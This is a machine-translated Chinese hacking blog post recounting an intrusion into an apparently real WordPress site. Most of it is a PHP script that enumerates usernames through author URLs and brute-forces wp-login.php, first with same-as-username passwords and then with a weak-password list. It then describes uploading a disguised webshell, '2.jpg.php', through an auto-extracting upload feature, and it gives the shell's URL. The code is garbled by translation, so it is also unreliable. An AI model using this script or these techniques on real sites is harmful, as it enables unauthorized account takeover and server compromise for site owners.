Permission 5 site full site cannot write webshell Method

Permission 5 site full site cannot write webshell Method

When you see a website (ignore 10 thousand words here), crawlers first.

Use this tool

I found a info directory suspicious. After opening it, I decided that it was WordPress based on my years of daily experience, keen observation, and strong analysis.
This blog program does not have any good vulnerabilities, and the easy-to-use XSS requires administrator interaction.
Use the following script:
 

Set_time_limit (0); $ domain = $ argv [1]; // get the user name for ($ I = 1; $ I <= 10; $ I ++) {$ url = $ domain. "/? Author = ". $ I; $ response = httprequest ($ url, 0); if ($ response = 404) {continue;} $ pattern = "/author \/(. *) \/feed/"; preg_match ($ pattern, $ response, $ name); $ namearray [] = $ name [1];} echo" get users all ". count ($ namearray ). "Name User \ n"; echo "cracking user with the same username and password: \ n"; $ crackname = crackpassword ($ namearray, "same "); $ passwords = file ("pass.txt"); echo "cracking weak password User: \ n"; if ($ crackname) {$ namearray = array_diff ($ namearray, $ Crackname);} crackpassword ($ namearray, $ passwords); function crackpassword ($ namearray, $ passwords) {global $ domain; $ crackname = ""; foreach ($ namearray as $ name) {$ url = $ domain. "/wp-login.php"; if ($ passwords = "same") {$ post = "log = ". urlencode ($ name ). "& pwd = ". urlencode ($ name ). "& wp-submit = % E7 % 99% BB % E5 % BD % 95 & redirect_to = ". urlencode ($ domain ). "% 2Fwp-admin % 2F & testcookie = 1"; $ pos = strpos (httpreque St ($ url, $ post), 'div id = "login_error" '); if ($ pos = false) {echo "$ name ". "\ n"; $ crackname [] = $ name ;}} else {foreach ($ passwords as $ pass) {$ post = "log = ". urlencode ($ name ). "& pwd = ". urlencode ($ pass ). "& wp-submit = % E7 % 99% BB % E5 % BD % 95 & redirect_to = ". urlencode ($ domain ). "% 2Fwp-admin % 2F & testcookie = 1"; $ pos = strpos (httprequest ($ url, $ post), 'div id = "login_error "'); if ($ pos = false) {echo "$ name $ Pass ". "\ n" ;}}}return $ crackname;} function httprequest ($ url, $ post) {$ ch = curl_init (); curl_setopt ($ ch, CURLOPT_URL, "$ url"); curl_setopt ($ ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt ($ ch, CURLOPT_SSL_VERIFYPEER, false); curl_setopt ($ ch, CURLOPT_FOLLOWLOCATION, 1 ); if ($ post) {curl_setopt ($ ch, CURLOPT_POST, 1); // The post submission method curl_setopt ($ ch, CURLOPT_POSTFIELDS, $ post );} $ output = curl_exec ($ ch); $ Httpcode = curl_getinfo ($ ch, CURLINFO_HTTP_CODE); curl_close ($ ch); if ($ httpcode = 404) {return 404;} else {return $ output ;}?>

Get the user directly and try the user with the same username and password
Pretty, account administrator privilege.
Do you think this is the end?
Haha, the whole site cannot be written
Next I found this and hooked it up ---- upload

2.jpg. php is webshell
OK upload will automatically decompress the address:
Https://www.bkjia.com//info/wp-content/uploads/2015/05/2.jpg.php
Getshell is achieved.